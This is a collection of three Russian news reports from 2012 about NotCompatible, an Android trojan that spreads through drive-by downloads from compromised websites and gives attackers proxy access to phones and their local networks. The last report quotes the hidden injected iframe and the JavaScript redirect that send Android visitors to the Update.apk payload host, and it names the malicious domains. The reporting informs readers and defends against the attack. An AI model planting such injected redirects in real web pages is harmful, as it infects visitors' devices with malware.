ИТ-компания Lockout сегодня сообщила об обнаружении десятка разных сайтов, распространяющих вредоносное программное обеспечение, ориентированное на пользователей Android и предназначенное для получения доступа к корпоративным сетям и разным защищенным ресурсам. Новое вредоносное ПО получило название NotCompatible (Несовместимо), так как оно выдает соответствующее сообщение, когда потенциальный пользователь-жертва пытается получить доступ к сайту со своего мобильного устройства. На сайтах размещается iFrame, который включает в код сайта вредоносное программное обеспечение, автоматически подгружающееся на мобильное устройства во время просмотра страницы. Сайт выводит фиктивное сообщение о том, что просматриваемая им страница несовместима с его устройством и предлагает загрузить ПО, которое, якобы, обеспечит просмотр. Однако опытного пользователя должен насторожить тот факт, что загрузка ПО идет не из Google Play, а с третьего сайта, который к официальным источникам не имеет отношения. В Lockout говорят, что ранее подобную тактику часто использовали относительно пользователей ПК, теперь же она перекочевала в мобильную сферу. В самой Google уже неоднократно заявляли, что либо сами поставляют все необходимое ПО для своей ОС, либо его можно скачать через официальный каталог приложений. По словам экспертов Lockout, обнаруженные ими образцы вредоносного ПО ссылаются за удаленными инструкциями на домен gaoanalitics.info и androidonlinefix.info, а командный сервер размещался по адресу notcompatibleapp.eu. "Судя по нашему анализу, NotCompatible - это троянец, который выступает в качества TCP relay/proxy и предлагает своим владельцам удаленный доступ к смартфону-жертве", - говорят в Lockout. (05:43) 03.05.2012 http://cybersecurity.ru/crypto/150204.html
Эксперты обнаружили первый "браузерный троян" для Android Пользователю достаточно посетить специальную веб-страницу, в которой содержится вредоносный код, и троянская программа автоматически загрузится в память устройства. При этом при посещении той же страницы с обычного компьютера ничего не происходит. МОСКВА, 3 мая - РИА Новости. Эксперты антивирусной компании Lookout обнаружили новую троянскую программу для Android, которая автоматически загружается на устройство пользователя при посещении зараженного сайта, сообщает пресс-служба компании. Большинство известных вредоносных приложений для Android обычно маскируются под популярные программы или бесплатные версии платных приложений для этой системы. Их авторы рассчитывают на то, что увидев знакомое название, невнимательный владелец сам загрузит и установит вредоносную программу. Обнаруженная специалистами Lookout угроза действует иначе - через браузер. "Пользователю достаточно посетить специальную веб-страницу, в которой содержится вредоносный код, и троянская программа автоматически загрузится в память устройства. При этом при посещении той же страницы с обычного компьютера ничего не происходит", - говорится в сообщении пресс-службы компании. В Lookout сообщают, что это первый за всю историю наблюдений случай, когда для заражения Android-устройств применяется атака через автоматическую загрузку приложения через браузер (drive by download). До этого подобные атаки были распространены в основном на персональных компьютерах под управлением системы Windows. Впрочем, обнаруженная Lookout атака не во всем повторяет настольный аналог. Например, в случае с атаками на ПК, пользователю достаточно посетить вредоносную страницу - троянская программа сама загрузится и установится в систему без ведома пользователя. В случае с находкой Lookout программа все же потребует участия пользователя: загрузившись в память смартфона или планшета, троянец "представляется" обновлением безопасности для системы Android и предлагает пользователю установить себя в систему, нажав кнопку "Install". Новым является и функционал программы. В отличие от большинства других Android-троянцев, которые рассылают SMS на платные короткие номера, опустошая счет пользователя, либо отсылают злоумышленникам персональные данные владельца устройства, NotCompatible обеспечивает злоумышленникам удаленный доступ к зараженному смартфону, а также доступ к локальной сети, в которой этот смартфон работает. Представители компании рекомендуют пользователям не посещать подозрительные сайты и запретить установку приложений из сторонних источников - эта функция есть во всех версиях мобильной платформы Android, и она исключает возможность установки вредоносного ПО, если оно не было опубликовано в официальном магазине приложений Google Play. Мобильная платформа Google Android является одной из самых популярных в мире. Однако вместе с ростом популярности у конечных пользователей, растет и внимание злоумышленников к данной платформе. По данным исследования российской антивирусной компании "Лаборатория Касперского", в 2011 году на долю Android пришлось 59% общего объема вредоносного ПО для мобильных устройств. При этом прежний лидер этого рейтинга, платформа J2ME, на которой работает большинство недорогих мобильных телефонов, оказался на втором месте с 32%. На третьем - Symbian с 8,3%, на четвертом месте - Windows Mobile c 1,6%. На категорию "прочие платформы", к которым относятся Apple iOS, RIM Blackberry OS и другие, пришлось менее половины процента от общего числа вредоносного кода для мобильных устройств в 2011 году. 03/05/2012 13:04 http://digit.ru/it/20120503/391459660.html
Первые Drive-by загрузки для Android-устройств Впервые обнаружено вредоносное ПО для Android, которое распространяется через drive-by загрузки. Зловред безвреден. По мнению специалистов, злоумышленники осуществляют эксперимент для проверки эффективности нового вектора атаки. Троян, получивший название NotCompatible, загружается на Android-устройство при посещении инфицированного сайта. После скачивания файла Update.apk пользователю предлагают установить программу на свой компьютер под видом системного обновления. При этом в системе должна быть также разрешена установка программ из неизвестных источников. Новый зловред обнаружен сотрудниками компании Lookout. Они предупреждают, что в будущем drive-by загрузки могут появиться на любом сайте. В данном случае на заражённые страницы внедрялся фрейм: <iframe style="visibility: hidden; display: none; display: none;" src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe> Вредоносная программа не проявляет себя при визите пользователя под операционными системами Windows, Linux, OS X или iOS, а реагирует только на user agent, который указывает на Android. В этом случае устройство получает такой код: <html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html> Отсюда автоматически начинается скачивание Update.apk. Вряд ли можно предположить, что NotCompatible поразит большое количество устройств, тем более он распространяется через небольшое количество сайтов с малой посещаемостью. Это чистого рода эксперимент, чтобы оценить эффективность атаки. Своего рода маркетинговое исследование. Распространение Update.apk в данный момент идёт с сайтов gaoanalitics.info и androidonlinefix.info, а управляющий сервер находится на notcompatibleapp.eu. Дата: 04.05.2012 http://www.xakep.ru/post/58652/